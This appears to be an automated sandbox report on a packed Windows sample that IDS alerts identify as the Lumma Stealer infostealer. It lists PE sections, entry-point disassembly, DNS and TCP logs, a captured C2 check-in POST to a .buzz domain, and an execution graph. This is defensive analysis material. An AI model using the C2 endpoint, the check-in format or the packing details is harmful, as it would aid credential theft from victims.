                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................I...........@...........................J......j....@.................................Y@..m..

                                                    File Icon

                                                    Icon Hash:90cececece8e8eb0

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x89d000
                                                    Entrypoint Section:.taggant
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:6
                                                    OS Version Minor:0
                                                    File Version Major:6
                                                    File Version Minor:0
                                                    Subsystem Version Major:6
                                                    Subsystem Version Minor:0
                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp 00007F8CACCE222Ah
                                                    divps xmm3, dqword ptr [eax+eax]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    jmp 00007F8CACCE4225h
                                                    add byte ptr [esi], al
                                                    or al, byte ptr [eax]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax+0Ah], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add dword ptr [eax+00000000h], eax
                                                    add byte ptr [eax], al
                                                    adc byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add ecx, dword ptr [edx]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    xor byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    or al, byte ptr [eax]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    or al, 80h
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    adc byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add ecx, dword ptr [edx]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    xor byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    and byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    and dword ptr [eax], eax
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add dword ptr [eax+00000000h], eax
                                                    add byte ptr [eax], al
                                                    adc byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add eax, 0000000Ah
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], dh
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], cl
                                                    add byte ptr [eax], 00000000h
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x1ac.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    0x10000x520000x264006a182c338dd80fd8086a5980eaeb84e7False0.9992659824346405data7.968015840636174IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x530000x1ac0x200c4249243ceaeb236e3ce8ce2ab2c9a69False0.5390625data5.249019796122045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    0x550000x2a90000x20025b4108814f5229c6d0683affad87774unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    rlrmwtje0x2fe0000x19e0000x19de0010591c050203565cf37e4099a3ce1579False0.9950118921775899data7.954785719367017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    txntjrfm0x49c0000x10000x600d7fd963349143811b258f2b066771660False0.5670572916666666data5.05547442056436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .taggant0x49d0000x30000x2200ed190571b664176d9045689ea380f707False0.06020220588235294DOS executable (COM)0.7429342904559886IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_MANIFEST0x530580x152ASCII text, with CRLF line terminators0.6479289940828402

                                                    Imports

                                                    DLLImport
                                                    kernel32.dlllstrcpy

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-12-27T08:49:33.176795+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730172.67.165.185443TCP
                                                    2024-12-27T08:49:34.173741+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730172.67.165.185443TCP
                                                    2024-12-27T08:49:34.173741+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730172.67.165.185443TCP
                                                    2024-12-27T08:49:35.367925+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731172.67.165.185443TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 27, 2024 08:49:31.553364038 CET49730443192.168.2.4172.67.165.185
                                                    Dec 27, 2024 08:49:31.553412914 CET44349730172.67.165.185192.168.2.4
                                                    Dec 27, 2024 08:49:31.553523064 CET49730443192.168.2.4172.67.165.185
                                                    Dec 27, 2024 08:49:31.556642056 CET49730443192.168.2.4172.67.165.185
                                                    Dec 27, 2024 08:49:31.556657076 CET44349730172.67.165.185192.168.2.4
                                                    Dec 27, 2024 08:49:33.176661015 CET44349730172.67.165.185192.168.2.4
                                                    Dec 27, 2024 08:49:33.176795006 CET49730443192.168.2.4172.67.165.185
                                                    Dec 27, 2024 08:49:33.222450972 CET49730443192.168.2.4172.67.165.185
                                                    Dec 27, 2024 08:49:33.222487926 CET44349730172.67.165.185192.168.2.4
                                                    Dec 27, 2024 08:49:33.222882032 CET44349730172.67.165.185192.168.2.4
                                                    Dec 27, 2024 08:49:33.274051905 CET49730443192.168.2.4172.67.165.185
                                                    Dec 27, 2024 08:49:33.443320036 CET49730443192.168.2.4172.67.165.185
                                                    Dec 27, 2024 08:49:33.443656921 CET49730443192.168.2.4172.67.165.185
                                                    Dec 27, 2024 08:49:33.443677902 CET44349730172.67.165.185192.168.2.4
                                                    Dec 27, 2024 08:49:34.173719883 CET44349730172.67.165.185192.168.2.4
                                                    Dec 27, 2024 08:49:34.173799992 CET44349730172.67.165.185192.168.2.4
                                                    Dec 27, 2024 08:49:34.173882961 CET49730443192.168.2.4172.67.165.185
                                                    Dec 27, 2024 08:49:34.189718008 CET49730443192.168.2.4172.67.165.185
                                                    Dec 27, 2024 08:49:34.189749002 CET44349730172.67.165.185192.168.2.4
                                                    Dec 27, 2024 08:49:34.205671072 CET49731443192.168.2.4172.67.165.185
                                                    Dec 27, 2024 08:49:34.205713987 CET44349731172.67.165.185192.168.2.4
                                                    Dec 27, 2024 08:49:34.205795050 CET49731443192.168.2.4172.67.165.185
                                                    Dec 27, 2024 08:49:34.206653118 CET49731443192.168.2.4172.67.165.185
                                                    Dec 27, 2024 08:49:34.206665993 CET44349731172.67.165.185192.168.2.4
                                                    Dec 27, 2024 08:49:35.367924929 CET49731443192.168.2.4172.67.165.185

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 27, 2024 08:49:31.400677919 CET5054053192.168.2.41.1.1.1
                                                    Dec 27, 2024 08:49:31.548150063 CET53505401.1.1.1192.168.2.4

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Dec 27, 2024 08:49:31.400677919 CET192.168.2.41.1.1.10x7a29Standard query (0)mindhandru.buzzA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Dec 27, 2024 08:49:31.548150063 CET1.1.1.1192.168.2.40x7a29No error (0)mindhandru.buzz172.67.165.185A (IP address)IN (0x0001)false
                                                    Dec 27, 2024 08:49:31.548150063 CET1.1.1.1192.168.2.40x7a29No error (0)mindhandru.buzz104.21.11.101A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • mindhandru.buzz

                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449730172.67.165.1854436656C:\Users\user\Desktop\PH1D3KHmOD.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-27 07:49:33 UTC262OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 8
                                                    Host: mindhandru.buzz
                                                    2024-12-27 07:49:33 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                    Data Ascii: act=life
                                                    2024-12-27 07:49:34 UTC1128INHTTP/1.1 200 OK
                                                    Date: Fri, 27 Dec 2024 07:49:34 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=tec4d732a1fubrsda15o6o0rk5; expires=Tue, 22 Apr 2025 01:36:12 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Frame-Options: DENY
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ajuSgI5o8b0itxnMTy1g4COJoSHP563E%2B2j3PGbwIM3MaVXvcGP%2BdzLG5uUBg9wCtnZf48XH%2FI3D9b%2B383Xjz9AYTzGe9WgL%2BEC7oGYDN1jS5FoFMu0PdGxCV3mWLRx3h8Q%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f87b6f50d1b0f51-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1465&rtt_var=559&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1938911&cwnd=204&unsent_bytes=0&cid=d6763de521990042&ts=1317&x=0"
                                                    2024-12-27 07:49:34 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                    Data Ascii: 2ok
                                                    2024-12-27 07:49:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:02:49:26
                                                    Start date:27/12/2024
                                                    Path:C:\Users\user\Desktop\PH1D3KHmOD.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\PH1D3KHmOD.exe"
                                                    Imagebase:0xe0000
                                                    File size:1'867'776 bytes
                                                    MD5 hash:F1F1FB7CE16D5883EA795E1EBBAFCF7A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:0.8%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:27.4%
                                                      Total number of Nodes:73
                                                      Total number of Limit Nodes:3
                                                      execution_graph 19871 11c570 19872 11c583 19871->19872 19873 11c585 19871->19873 19874 11c58a RtlFreeHeap 19873->19874 19832 11c55c RtlAllocateHeap 19833 e8600 19837 e860f 19833->19837 19834 e8a48 ExitProcess 19835 e8a31 19842 11e080 19835->19842 19837->19834 19837->19835 19839 eb7b0 FreeLibrary 19837->19839 19840 eb7cc 19839->19840 19841 eb7d1 FreeLibrary 19840->19841 19841->19835 19845 11f970 19842->19845 19844 11e085 FreeLibrary 19844->19834 19846 11f979 19845->19846 19846->19844 19847 11679f 19848 1167bc 19847->19848 19849 11682d 19848->19849 19851 11e110 LdrInitializeThunk 19848->19851 19851->19848 19852 e9d1e 19853 e9d40 19852->19853 19853->19853 19854 e9d94 LoadLibraryExW 19853->19854 19855 e9da5 19854->19855 19856 e9e74 LoadLibraryExW 19855->19856 19857 e9e85 19856->19857 19858 1390c2 19859 139213 VirtualAlloc 19858->19859 19860 139227 19859->19860 19860->19860 19875 11e760 19877 11e780 19875->19877 19876 11e7be 19877->19876 19879 11e110 LdrInitializeThunk 19877->19879 19879->19876 19880 121320 19881 121340 19880->19881 19881->19881 19882 12145e 19881->19882 19884 11e110 LdrInitializeThunk 19881->19884 19884->19882 19885 121720 19886 121750 19885->19886 19889 1217a9 19886->19889 19891 11e110 LdrInitializeThunk 19886->19891 19887 12184e 19889->19887 19892 11e110 LdrInitializeThunk 19889->19892 19891->19889 19892->19887 19893 eddbb 19897 e1f70 19893->19897 19895 eddc0 CoUninitialize 19896 eeea0 19895->19896 19898 e1f7e 19897->19898 19899 139865 VirtualAlloc 19900 11e967 19901 11e980 19900->19901 19904 11e110 LdrInitializeThunk 19901->19904 19903 11e9ef 19904->19903 19905 11ea29 19907 11ea50 19905->19907 19906 11ea8e 19911 11e110 LdrInitializeThunk 19906->19911 19907->19906 19912 11e110 LdrInitializeThunk 19907->19912 19910 11eb59 19911->19910 19912->19906 19861 11eb88 19863 11eba0 19861->19863 19862 11ebde 19862->19862 19865 11ec4e 19862->19865 19867 11e110 LdrInitializeThunk 19862->19867 19863->19862 19868 11e110 LdrInitializeThunk 19863->19868 19867->19865 19868->19862 19913 eec77 19914 eec8f CoInitializeSecurity 19913->19914 19915 e9eb7 19918 11fe00 19915->19918 19917 e9ec7 WSAStartup 19919 11fe20 19918->19919 19919->19917 19919->19919 19869 eef53 19870 eef5c CoInitializeEx 19869->19870

                                                      Executed Functions

                                                      Function 000E8600 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 356COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 e8600-e8611 call 11d9a0 3 e8a48-e8a4f ExitProcess 0->3 4 e8617-e861e call 1162a0 0->4 7 e8624-e864a 4->7 8 e8a31-e8a38 4->8 16 e864c-e864e 7->16 17 e8650-e887f 7->17 9 e8a3a-e8a40 call e7f60 8->9 10 e8a43 call 11e080 8->10 9->10 10->3 16->17 19 e8880-e88ce 17->19 19->19 20 e88d0-e891d call 11c540 19->20 23 e8920-e8943 20->23 24 e8964-e897c 23->24 25 e8945-e8962 23->25 27 e8a0d-e8a25 call e9d00 24->27 28 e8982-e8a0b 24->28 25->23 27->8 31 e8a27 call ecb90 27->31 28->27 33 e8a2c call eb7b0 31->33 33->8
                                                      APIs
                                                      • ExitProcess.KERNEL32(00000000), ref: 000E8A4A
                                                        • Part of subcall function 000EB7B0: FreeLibrary.KERNEL32(000E8A31), ref: 000EB7B6
                                                        • Part of subcall function 000EB7B0: FreeLibrary.KERNEL32 ref: 000EB7D7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary$ExitProcess
                                                      • String ID: b]u)$}$}
                                                      • API String ID: 1614911148-2900034282
                                                      • Opcode ID: 0d365ce41af22e1d04c2a765551b54615c23c03c46c90b9417d079bee6afcdbe
                                                      • Instruction ID: d4245c8f48ca5b4c53d6a89a2497eb32fa70757f159550f1889c3b6da73d9ce2
                                                      • Opcode Fuzzy Hash: 0d365ce41af22e1d04c2a765551b54615c23c03c46c90b9417d079bee6afcdbe
                                                      • Instruction Fuzzy Hash: 3AC1D473E187144FC718DF69C84125AF7D6ABC8710F1EC52EA898EB355EA749C058BC2
                                                      Function 0011E110 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 99 11e110-11e142 LdrInitializeThunk
                                                      APIs
                                                      • LdrInitializeThunk.NTDLL(0012148A,?,00000018,?,?,00000018,?,?,?), ref: 0011E13E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                      • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                      • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                      • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                      Function 00121720 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 101 121720-121741 102 121750-12176b 101->102 102->102 103 12176d-121779 102->103 104 1217e0-1217e5 103->104 105 12177b-121785 103->105 107 1217eb-1217ff 104->107 108 121879-12187b 104->108 106 121790-121797 105->106 109 121799-1217a7 106->109 110 1217ad-1217b5 106->110 113 121800-12181b 107->113 111 12188d-121894 108->111 112 12187d-121884 108->112 109->106 114 1217a9-1217ab 109->114 110->104 115 1217b7-1217d8 call 11e110 110->115 116 121886 112->116 117 12188a 112->117 113->113 118 12181d-121828 113->118 114->104 123 1217dd 115->123 116->117 117->111 120 121871-121873 118->120 121 12182a-121832 118->121 120->108 122 121875 120->122 124 121840-121847 121->124 122->108 123->104 125 121850-121856 124->125 126 121849-12184c 124->126 125->120 127 121858-12186e call 11e110 125->127 126->124 128 12184e 126->128 127->120 128->120
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: =<32
                                                      • API String ID: 2994545307-852023076
                                                      • Opcode ID: 860fd8f83ec06c000e80182995722be7a71d71ac7b534439f44316010fe17819
                                                      • Instruction ID: 32835d1800aa3b39152806f4180ff2475407d47a63014169840cb9a9c78cbbaf
                                                      • Opcode Fuzzy Hash: 860fd8f83ec06c000e80182995722be7a71d71ac7b534439f44316010fe17819
                                                      • Instruction Fuzzy Hash: 483128387043147BE728DE54ACD1B7BB3A6EB94750F18852CE98557290D731DCA19782
                                                      Function 000E9D1E Relevance: 3.1, APIs: 2, Instructions: 142libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 62 e9d1e-e9d34 63 e9d40-e9d52 62->63 63->63 64 e9d54-e9d7e 63->64 65 e9d80-e9d92 64->65 65->65 66 e9d94-e9e13 LoadLibraryExW call 11d960 65->66 69 e9e20-e9e32 66->69 69->69 70 e9e34-e9e5e 69->70 71 e9e60-e9e72 70->71 71->71 72 e9e74-e9e80 LoadLibraryExW call 11d960 71->72 74 e9e85-e9e98 72->74
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(?,00000000), ref: 000E9D98
                                                      • LoadLibraryExW.KERNEL32(?,00000000), ref: 000E9E78
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: cecfa1e5c1700c8c23cf440ec753784d63e25ef3b3f733191ba4de4554832f8e
                                                      • Instruction ID: 3bcefa5e698453e017dd33f7aa98d9b470dba659985029bedf9b6e297ed8feee
                                                      • Opcode Fuzzy Hash: cecfa1e5c1700c8c23cf440ec753784d63e25ef3b3f733191ba4de4554832f8e
                                                      • Instruction Fuzzy Hash: C24101B4D003509FE7249F7899D2A9A7FB1EB06324F50529CD5902F3A6C731981ACBE2
                                                      Function 000EEF53 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
